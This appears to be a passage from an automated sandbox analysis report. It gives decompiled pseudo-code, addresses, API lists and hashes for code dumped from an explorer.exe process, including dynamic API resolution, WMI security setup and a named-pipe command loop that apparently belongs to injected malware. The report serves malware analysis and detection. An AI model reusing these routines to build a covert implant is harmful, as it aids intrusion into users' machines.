                                                                                                                                                                                              0x02f94013
                                                                                                                                                                                              0x02f94017
                                                                                                                                                                                              0x02f94019
                                                                                                                                                                                              0x02f94026
                                                                                                                                                                                              0x02f9403a
                                                                                                                                                                                              0x02f94049
                                                                                                                                                                                              0x02f9405a
                                                                                                                                                                                              0x02f94023
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f94023
                                                                                                                                                                                              0x02f9405c
                                                                                                                                                                                              0x02f94060
                                                                                                                                                                                              0x02f94065
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f94065
                                                                                                                                                                                              0x02f94070
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f94072
                                                                                                                                                                                              0x02f94076
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f94078
                                                                                                                                                                                              0x02f93e9c
                                                                                                                                                                                              0x02f93ea5
                                                                                                                                                                                              0x02f93eb3
                                                                                                                                                                                              0x02f93eb6
                                                                                                                                                                                              0x02f93ed3
                                                                                                                                                                                              0x02f93eda
                                                                                                                                                                                              0x02f93eec
                                                                                                                                                                                              0x02f93eec
                                                                                                                                                                                              0x02f93ef3
                                                                                                                                                                                              0x02f93f03
                                                                                                                                                                                              0x02f93f1b
                                                                                                                                                                                              0x02f93f05
                                                                                                                                                                                              0x02f93f0d
                                                                                                                                                                                              0x02f93f0d
                                                                                                                                                                                              0x02f93f1e
                                                                                                                                                                                              0x02f93f22
                                                                                                                                                                                              0x02f93f32
                                                                                                                                                                                              0x02f93f55
                                                                                                                                                                                              0x02f93f67
                                                                                                                                                                                              0x02f93f34
                                                                                                                                                                                              0x02f93f48
                                                                                                                                                                                              0x02f93f48
                                                                                                                                                                                              0x02f93f71
                                                                                                                                                                                              0x02f93f8d
                                                                                                                                                                                              0x02f93f73
                                                                                                                                                                                              0x02f93f82
                                                                                                                                                                                              0x02f93f82
                                                                                                                                                                                              0x02f93f95
                                                                                                                                                                                              0x02f93f9e
                                                                                                                                                                                              0x02f93f9e
                                                                                                                                                                                              0x02f93fac
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f93ef5
                                                                                                                                                                                              0x02f93ef7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f93ef7
                                                                                                                                                                                              0x02f93ef3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f93eb6
                                                                                                                                                                                              0x02f93d99
                                                                                                                                                                                              0x02f93da7
                                                                                                                                                                                              0x02f93dac
                                                                                                                                                                                              0x02f93db7
                                                                                                                                                                                              0x02f93dba
                                                                                                                                                                                              0x02f93dbe
                                                                                                                                                                                              0x02f93dc0
                                                                                                                                                                                              0x02f93dd0
                                                                                                                                                                                              0x02f93dd9
                                                                                                                                                                                              0x02f93de2
                                                                                                                                                                                              0x02f93dea
                                                                                                                                                                                              0x02f93df3
                                                                                                                                                                                              0x02f93dfe
                                                                                                                                                                                              0x02f93e04
                                                                                                                                                                                              0x02f93e07
                                                                                                                                                                                              0x02f93e0a
                                                                                                                                                                                              0x02f93e11
                                                                                                                                                                                              0x02f93e18
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f93e23
                                                                                                                                                                                              0x02f93e31
                                                                                                                                                                                              0x02f93e3c
                                                                                                                                                                                              0x02f93e46
                                                                                                                                                                                              0x02f93e5e
                                                                                                                                                                                              0x02f93e6b
                                                                                                                                                                                              0x02f93e6b
                                                                                                                                                                                              0x02f93e48
                                                                                                                                                                                              0x02f93e53
                                                                                                                                                                                              0x02f93e53
                                                                                                                                                                                              0x02f93e72
                                                                                                                                                                                              0x02f93e72
                                                                                                                                                                                              0x02f93e7a
                                                                                                                                                                                              0x02f93e7a
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 02F93ECD
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000), ref: 02F93EE6
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 02F93F42
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 02F93F61
                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,00000000), ref: 02F94052
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1872726118-0
                                                                                                                                                                                              • Opcode ID: ce2764574469e47606b41e55e1bffa13ff6eef67eab22a368b1fad48f0ee7261
                                                                                                                                                                                              • Instruction ID: 99969266bb2d0fa19dc7d0a4c9b56081ece302c3271f8252b4295f7b4a490311
                                                                                                                                                                                              • Opcode Fuzzy Hash: ce2764574469e47606b41e55e1bffa13ff6eef67eab22a368b1fad48f0ee7261
                                                                                                                                                                                              • Instruction Fuzzy Hash: 84E1B175E04209DFEF14CFA8C980AADBBB1FF08398F148559E915AB3A1D730A941CF50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F919A9 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                                                                                                              • API String ID: 0-2132903582
                                                                                                                                                                                              • Opcode ID: 399081f37730c5f501b9ab750906c72c231d43401d41019892c07dbcbb91dab8
                                                                                                                                                                                              • Instruction ID: d9927c747cd7d5f8315449140385b38bbec4cdd2d3779230f505486c518e17bb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 399081f37730c5f501b9ab750906c72c231d43401d41019892c07dbcbb91dab8
                                                                                                                                                                                              • Instruction Fuzzy Hash: C941A132B0020797FF284E6C9D99BBF3A5AEF512D4F14003AFB1E96250E261CD95C6A5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F8E400 Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 30%
                                                                                                                                                                                              			E02F8E400(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x2f9c868, 0, 1, 0x2f9c878, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E02F88BDE(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













                                                                                                                                                                                              0x02f8e40d
                                                                                                                                                                                              0x02f8e410
                                                                                                                                                                                              0x02f8e413
                                                                                                                                                                                              0x02f8e424
                                                                                                                                                                                              0x02f8e42a
                                                                                                                                                                                              0x02f8e43b
                                                                                                                                                                                              0x02f8e443
                                                                                                                                                                                              0x02f8e494
                                                                                                                                                                                              0x02f8e494
                                                                                                                                                                                              0x02f8e499
                                                                                                                                                                                              0x02f8e49e
                                                                                                                                                                                              0x02f8e49e
                                                                                                                                                                                              0x02f8e4a1
                                                                                                                                                                                              0x02f8e4a6
                                                                                                                                                                                              0x02f8e4ab
                                                                                                                                                                                              0x02f8e4ab
                                                                                                                                                                                              0x02f8e4ae
                                                                                                                                                                                              0x02f8e445
                                                                                                                                                                                              0x02f8e446
                                                                                                                                                                                              0x02f8e44c
                                                                                                                                                                                              0x02f8e45d
                                                                                                                                                                                              0x02f8e462
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8e464
                                                                                                                                                                                              0x02f8e471
                                                                                                                                                                                              0x02f8e479
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8e47b
                                                                                                                                                                                              0x02f8e47d
                                                                                                                                                                                              0x02f8e485
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8e487
                                                                                                                                                                                              0x02f8e48a
                                                                                                                                                                                              0x02f8e490
                                                                                                                                                                                              0x02f8e490
                                                                                                                                                                                              0x02f8e485
                                                                                                                                                                                              0x02f8e479
                                                                                                                                                                                              0x02f8e462
                                                                                                                                                                                              0x02f8e4b3

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,02F8E731,000009DA,00000000,?,00000000), ref: 02F8E413
                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,02F8E731,000009DA,00000000,?,00000000), ref: 02F8E424
                                                                                                                                                                                              • CoCreateInstance.OLE32(02F9C868,00000000,00000001,02F9C878,?,?,02F8E731,000009DA,00000000,?,00000000), ref: 02F8E43B
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 02F8E446
                                                                                                                                                                                              • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,02F8E731,000009DA,00000000,?,00000000), ref: 02F8E471
                                                                                                                                                                                                • Part of subcall function 02F88BDE: RtlAllocateHeap.NTDLL(00000008,?,?,02F8959D,00000100,?,02F86507), ref: 02F88BEC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1610782348-0
                                                                                                                                                                                              • Opcode ID: 0c4d0741155fb9f7966b0c4a480747db10200aa2137f59a1d5b646d45f56bba4
                                                                                                                                                                                              • Instruction ID: fa620f71f6b68ad466a750fe500003f79915bdbd77402ba26b9c439efbbf0926
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c4d0741155fb9f7966b0c4a480747db10200aa2137f59a1d5b646d45f56bba4
                                                                                                                                                                                              • Instruction Fuzzy Hash: F8214F74B40245BBEB249B63CD4DE5BBF7CEFC6B55F10419DB605A6290C6709A40CA30
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F93379 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                                                              			E02F93379(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				signed int _t23;
				void* _t30;
				char* _t31;
				char* _t33;
				char* _t35;
				char* _t37;
				char* _t38;
				long long* _t40;

				_t30 = __edi;
				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t35 = _a4;
				_push(_t25);
				 *_t40 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t35);
				L02F934D2();
				_t23 = _t12;
				if(_t23 < 0 || _t23 >= _a8) {
					L16:
					_t13 = _t12 | 0xffffffff;
					goto L17;
				} else {
					E02F93352(_t12, _t35);
					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
						L8:
						_push(_t30);
						_t37 = strchr(_t35, 0x65);
						_t31 = _t37;
						if(_t37 == 0) {
							L15:
							_t13 = _t23;
							L17:
							return _t13;
						}
						_t38 = _t37 + 1;
						_t33 = _t31 + 2;
						if( *_t38 == 0x2d) {
							_t38 = _t33;
						}
						while( *_t33 == 0x30) {
							_t33 = _t33 + 1;
						}
						if(_t33 != _t38) {
							E02F88CE0(_t38, _t33, _t23 - _t33 + _a4);
							_t23 = _t23 + _t38 - _t33;
						}
						goto L15;
					} else {
						_t6 = _t23 + 3; // 0x2f91b64
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L16;
						}
						_t35[_t23] = 0x302e;
						( &(_t35[2]))[_t23] = 0;
						_t23 = _t23 + 2;
						goto L8;
					}
				}
			}













                                                                                                                                                                                              0x02f93379
                                                                                                                                                                                              0x02f9337c
                                                                                                                                                                                              0x02f93381
                                                                                                                                                                                              0x02f93385
                                                                                                                                                                                              0x02f93385
                                                                                                                                                                                              0x02f9338b
                                                                                                                                                                                              0x02f9338f
                                                                                                                                                                                              0x02f93390
                                                                                                                                                                                              0x02f93393
                                                                                                                                                                                              0x02f93394
                                                                                                                                                                                              0x02f93399
                                                                                                                                                                                              0x02f9339c
                                                                                                                                                                                              0x02f9339d
                                                                                                                                                                                              0x02f933a2
                                                                                                                                                                                              0x02f933a9
                                                                                                                                                                                              0x02f93432
                                                                                                                                                                                              0x02f93432
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f933b4
                                                                                                                                                                                              0x02f933b5
                                                                                                                                                                                              0x02f933c7
                                                                                                                                                                                              0x02f933ed
                                                                                                                                                                                              0x02f933ed
                                                                                                                                                                                              0x02f933f6
                                                                                                                                                                                              0x02f933f8
                                                                                                                                                                                              0x02f933fe
                                                                                                                                                                                              0x02f9342d
                                                                                                                                                                                              0x02f9342d
                                                                                                                                                                                              0x02f93435
                                                                                                                                                                                              0x02f93438
                                                                                                                                                                                              0x02f93438
                                                                                                                                                                                              0x02f93400
                                                                                                                                                                                              0x02f93401
                                                                                                                                                                                              0x02f93407
                                                                                                                                                                                              0x02f93409
                                                                                                                                                                                              0x02f93409
                                                                                                                                                                                              0x02f9340e
                                                                                                                                                                                              0x02f9340d
                                                                                                                                                                                              0x02f9340d
                                                                                                                                                                                              0x02f93415
                                                                                                                                                                                              0x02f93421
                                                                                                                                                                                              0x02f9342b
                                                                                                                                                                                              0x02f9342b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f933d7
                                                                                                                                                                                              0x02f933d7
                                                                                                                                                                                              0x02f933d7
                                                                                                                                                                                              0x02f933dd
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f933df
                                                                                                                                                                                              0x02f933e5
                                                                                                                                                                                              0x02f933ea
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f933ea
                                                                                                                                                                                              0x02f933c7

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: strchr$_snprintf
                                                                                                                                                                                              • String ID: %.*g
                                                                                                                                                                                              • API String ID: 3619936089-952554281
                                                                                                                                                                                              • Opcode ID: 1958502515e15b7150740f3d6680f5a3b1f3ebd0d95c1ab581355db76e65d943
                                                                                                                                                                                              • Instruction ID: b3ce14b2a9902c61c6fe5cc32fbe3e1b046fc641ddd6e117a28450e1949ef8fa
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1958502515e15b7150740f3d6680f5a3b1f3ebd0d95c1ab581355db76e65d943
                                                                                                                                                                                              • Instruction Fuzzy Hash: E3215772B4561527FF325A1CDD81F9A3B8CAF463E4F5A40E5FB449A280E7B1DD408790
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F8377F Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 306pipeCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                                                              			E02F8377F(void* __fp0) {
				signed int _v144;
				signed int _v152;
				char _v160;
				char _v164;
				char _v168;
				signed int _v172;
				char _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _v200;
				signed int _v204;
				intOrPtr _t72;
				intOrPtr _t75;
				signed int _t80;
				signed int _t81;
				signed int _t84;
				signed int _t87;
				signed int _t88;
				signed int _t100;
				void* _t102;
				void* _t103;
				unsigned int* _t104;
				signed int _t110;
				signed int _t113;
				void* _t118;
				intOrPtr _t124;
				signed int _t127;
				intOrPtr _t129;
				intOrPtr _t132;
				void* _t133;
				void* _t137;
				signed int _t146;
				signed int _t148;
				signed short* _t149;
				signed int _t159;
				intOrPtr* _t183;
				void* _t187;
				void* _t188;
				void* _t189;
				signed short* _t192;
				void* _t196;
				signed int _t199;
				signed int _t200;
				signed int _t203;
				signed int _t204;
				char _t205;
				signed int _t206;
				void* _t208;
				void* _t214;
				void* _t221;

				_t221 = __fp0;
				_t208 = (_t206 & 0xfffffff8) - 0xac;
				_v144 = 0;
				_v172 = 0;
				while(1) {
					_t72 =  *0x2f9f818; // 0x508f6c8
					_push(0);
					_push( *0x2f9f804);
					_v152 = 0;
					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(0);
					_push( &_v160);
					_t75 =  *0x2f9f818; // 0x508f6c8
					_push(0x80000);
					_push( *0x2f9f8bc);
					_push( *0x2f9f804);
					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
						GetLastError();
						goto L56;
					} else {
						_t149 =  *0x2f9f8bc; // 0x0
						_t80 =  *_t149 & 0x0000ffff;
						_t214 = _t80 - 8;
						if(_t214 > 0) {
							_t81 = _t80 - 9;
							__eflags = _t81;
							if(_t81 == 0) {
								E02F90962( &_v200);
								L12:
								_t84 =  &_v200;
								L13:
								_push(4);
								L14:
								_push(_t84);
								_push(5);
								L31:
								_pop(_t187);
								E02F8D1A6(_t187);
								L32:
								L56:
								DisconnectNamedPipe( *0x2f9f804);
								_push(0);
								_pop(0);
								if(_v172 == 0) {
									continue;
								}
								break;
							}
							_t87 = _t81;
							__eflags = _t87;
							if(_t87 == 0) {
								_v204 = 0;
								_t88 = E02F8171A( &_v204, _t221);
								_v188 = _t88;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(4);
									_v192 = 0;
									_push( &_v192);
									L19:
									_push(0xa);
									goto L31;
								}
								_t146 = _v204;
								_t90 = _t146 * 0x16;
								_v184 = _t146 * 0x16;
								_t203 = E02F88BDE(_t90);
								_v192 = _t203;
								__eflags = _t203;
								if(_t203 == 0) {
									_t64 =  &_v192;
									 *_t64 = _v192 & 0x00000000;
									__eflags =  *_t64;
									_push(4);
									_push( &_v192);
									_t188 = 0xa;
									E02F8D1A6(_t188);
									L52:
									E02F88BF4( &_v188, _t146);
									goto L32;
								}
								_t199 = 0;
								__eflags = _t146;
								if(_t146 == 0) {
									L50:
									_push(E02F8A43D(_t203));
									_push(_t203);
									_t189 = 5;
									E02F8D1A6(_t189);
									E02F88BF4( &_v192, 0xffffffff);
									_t208 = _t208 + 0x10;
									goto L52;
								}
								_t159 = _v188 + 4;
								__eflags = _t159;
								_v204 = _t159;
								do {
									__eflags = _t199;
									if(_t199 != 0) {
										__eflags = _t199 - _t146 - 1;
										if(_t199 < _t146 - 1) {
											_t102 = E02F8A43D(_t203);
											_t159 = _v204;
											 *((short*)(_t102 + _t203)) = 0x3b;
										}
									}
									_t100 =  *_t159;
									_v196 = _t100;
									__eflags = _t100;
									if(_t100 != 0) {
										_t103 = E02F8A43D(_t203);
										_t104 = _v204;
										_push(_t104[1] & 0x0000ffff);
										_push( *_t104 >> 0x18);
										_push(_t104[0] & 0x000000ff);
										_push(_t104[0] & 0x000000ff);
										_t110 = E02F8A43D(_t203) + _t203;
										__eflags = _t110;
										E02F89E12(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
										_t159 = _v204;
										_t208 = _t208 + 0x20;
									}
									_t199 = _t199 + 1;
									_t159 = _t159 + 0x20;
									_v204 = _t159;
									__eflags = _t199 - _t146;
								} while (_t199 < _t146);
								goto L50;
							}
							__eflags = _t87 != 1;
							if(_t87 != 1) {
								goto L56;
							}
							_v204 = 0;
							_t113 = E02F8171A( &_v204, _t221);
							_t204 = _v204;
							_v196 = _t113;
							__eflags = _t113;
							if(_t113 != 0) {
								E02F88BF4( &_v196, _t204);
							}
							_v204 = _t204 * 0x16;
							_t84 =  &_v204;
							goto L13;
						}
						if(_t214 == 0) {
							_t84 = E02F90962( &_v200);
							L16:
							__eflags = _t84;
							if(_t84 == 0) {
								_push(0);
								_push(0);
								goto L19;
							}
							_push(_v200);
							goto L14;
						}
						_t118 = _t80 - 1;
						if(_t118 == 0) {
							_t200 = E02F89B33( &(_t149[4]), 0x20, 1,  &_v176);
							_v196 = _t200;
							__eflags = _t200;
							if(_t200 == 0) {
								L30:
								_t192 =  *0x2f9f8bc; // 0x0
								E02F89EDB( &_v164,  &(_t192[4]), 0x80);
								_push(0x84);
								_push( &_v168);
								_push(2);
								goto L31;
							}
							_t205 = _v176;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								_t124 = E02F81DD3(E02F89F6F( *_t200, __eflags), 0, 0, 0);
								_t208 = _t208 + 0x10;
								_v168 = _t124;
								goto L30;
							}
							_t125 = _t205 - 1;
							_v184 = _t205 - 1;
							_t127 = E02F88BDE(_t125 << 2);
							_v188 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								goto L30;
							}
							_t148 = 1;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								L28:
								_t129 = E02F81DD3(E02F89F6F( *_t200, __eflags), _t127, _v184, 0);
								_t208 = _t208 + 0x10;
								_v168 = _t129;
								E02F89C2C( &_v176);
								goto L30;
							}
							_v204 = _t127;
							do {
								_t132 = E02F89880( *((intOrPtr*)(_t200 + _t148 * 4)), E02F8A43D( *((intOrPtr*)(_t200 + _t148 * 4))));
								_t183 = _v204;
								_t148 = _t148 + 1;
								 *_t183 = _t132;
								_v204 = _t183 + 4;
								__eflags = _t148 - _t205;
							} while (__eflags < 0);
							_t127 = _v188;
							goto L28;
						}
						_t133 = _t118 - 3;
						if(_t133 == 0) {
							_push(0);
							_push(0);
							_t196 = 5;
							E02F85EC3(E02F8D1A6(_t196));
							_v172 = 1;
							goto L56;
						}
						_t137 = _t133;
						if(_t137 == 0) {
							_t84 = E02F90940( &_v200);
							goto L16;
						}
						if(_t137 != 1) {
							goto L56;
						}
						E02F90940( &_v200);
						goto L12;
					}
				}
				return 0;
			}
























































                                                                                                                                                                                              0x02f8377f
                                                                                                                                                                                              0x02f83785
                                                                                                                                                                                              0x02f83790
                                                                                                                                                                                              0x02f83794
                                                                                                                                                                                              0x02f83798
                                                                                                                                                                                              0x02f83798
                                                                                                                                                                                              0x02f8379d
                                                                                                                                                                                              0x02f8379e
                                                                                                                                                                                              0x02f837a4
                                                                                                                                                                                              0x02f837b0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f837c3
                                                                                                                                                                                              0x02f837c8
                                                                                                                                                                                              0x02f837c9
                                                                                                                                                                                              0x02f837ce
                                                                                                                                                                                              0x02f837d3
                                                                                                                                                                                              0x02f837d9
                                                                                                                                                                                              0x02f837e7
                                                                                                                                                                                              0x02f83af7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f837f8
                                                                                                                                                                                              0x02f837f8
                                                                                                                                                                                              0x02f837fe
                                                                                                                                                                                              0x02f83801
                                                                                                                                                                                              0x02f83804
                                                                                                                                                                                              0x02f83976
                                                                                                                                                                                              0x02f83976
                                                                                                                                                                                              0x02f83979
                                                                                                                                                                                              0x02f83aed
                                                                                                                                                                                              0x02f83833
                                                                                                                                                                                              0x02f83834
                                                                                                                                                                                              0x02f83838
                                                                                                                                                                                              0x02f83838
                                                                                                                                                                                              0x02f8383a
                                                                                                                                                                                              0x02f8383a
                                                                                                                                                                                              0x02f8383b
                                                                                                                                                                                              0x02f8395a
                                                                                                                                                                                              0x02f8395a
                                                                                                                                                                                              0x02f8395b
                                                                                                                                                                                              0x02f83960
                                                                                                                                                                                              0x02f83afd
                                                                                                                                                                                              0x02f83b03
                                                                                                                                                                                              0x02f83b0e
                                                                                                                                                                                              0x02f83b10
                                                                                                                                                                                              0x02f83b11
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f83b11
                                                                                                                                                                                              0x02f83980
                                                                                                                                                                                              0x02f83980
                                                                                                                                                                                              0x02f83983
                                                                                                                                                                                              0x02f839c8
                                                                                                                                                                                              0x02f839cc
                                                                                                                                                                                              0x02f839d1
                                                                                                                                                                                              0x02f839d5
                                                                                                                                                                                              0x02f839d7
                                                                                                                                                                                              0x02f83ad8
                                                                                                                                                                                              0x02f83ade
                                                                                                                                                                                              0x02f83ae2
                                                                                                                                                                                              0x02f83859
                                                                                                                                                                                              0x02f83859
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f83859
                                                                                                                                                                                              0x02f839dd
                                                                                                                                                                                              0x02f839e1
                                                                                                                                                                                              0x02f839e5
                                                                                                                                                                                              0x02f839ee
                                                                                                                                                                                              0x02f839f0
                                                                                                                                                                                              0x02f839f5
                                                                                                                                                                                              0x02f839f7
                                                                                                                                                                                              0x02f83ab2
                                                                                                                                                                                              0x02f83ab2
                                                                                                                                                                                              0x02f83ab2
                                                                                                                                                                                              0x02f83abb
                                                                                                                                                                                              0x02f83abd
                                                                                                                                                                                              0x02f83ac0
                                                                                                                                                                                              0x02f83ac1
                                                                                                                                                                                              0x02f83ac8
                                                                                                                                                                                              0x02f83ace
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f83ace
                                                                                                                                                                                              0x02f839fd
                                                                                                                                                                                              0x02f839ff
                                                                                                                                                                                              0x02f83a01
                                                                                                                                                                                              0x02f83a90
                                                                                                                                                                                              0x02f83a97
                                                                                                                                                                                              0x02f83a98
                                                                                                                                                                                              0x02f83a9b
                                                                                                                                                                                              0x02f83a9c
                                                                                                                                                                                              0x02f83aa8
                                                                                                                                                                                              0x02f83aad
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f83aad
                                                                                                                                                                                              0x02f83a0b
                                                                                                                                                                                              0x02f83a0b
                                                                                                                                                                                              0x02f83a0e
                                                                                                                                                                                              0x02f83a12
                                                                                                                                                                                              0x02f83a12
                                                                                                                                                                                              0x02f83a14
                                                                                                                                                                                              0x02f83a19
                                                                                                                                                                                              0x02f83a1b
                                                                                                                                                                                              0x02f83a1e
                                                                                                                                                                                              0x02f83a24
                                                                                                                                                                                              0x02f83a28
                                                                                                                                                                                              0x02f83a28
                                                                                                                                                                                              0x02f83a1b
                                                                                                                                                                                              0x02f83a2e
                                                                                                                                                                                              0x02f83a30
                                                                                                                                                                                              0x02f83a34
                                                                                                                                                                                              0x02f83a36
                                                                                                                                                                                              0x02f83a39
                                                                                                                                                                                              0x02f83a40
                                                                                                                                                                                              0x02f83a49
                                                                                                                                                                                              0x02f83a4f
                                                                                                                                                                                              0x02f83a54
                                                                                                                                                                                              0x02f83a5d
                                                                                                                                                                                              0x02f83a75
                                                                                                                                                                                              0x02f83a75
                                                                                                                                                                                              0x02f83a78
                                                                                                                                                                                              0x02f83a7d
                                                                                                                                                                                              0x02f83a81
                                                                                                                                                                                              0x02f83a81
                                                                                                                                                                                              0x02f83a84
                                                                                                                                                                                              0x02f83a85
                                                                                                                                                                                              0x02f83a88
                                                                                                                                                                                              0x02f83a8c
                                                                                                                                                                                              0x02f83a8c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f83a12
                                                                                                                                                                                              0x02f83985
                                                                                                                                                                                              0x02f83988
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f83992
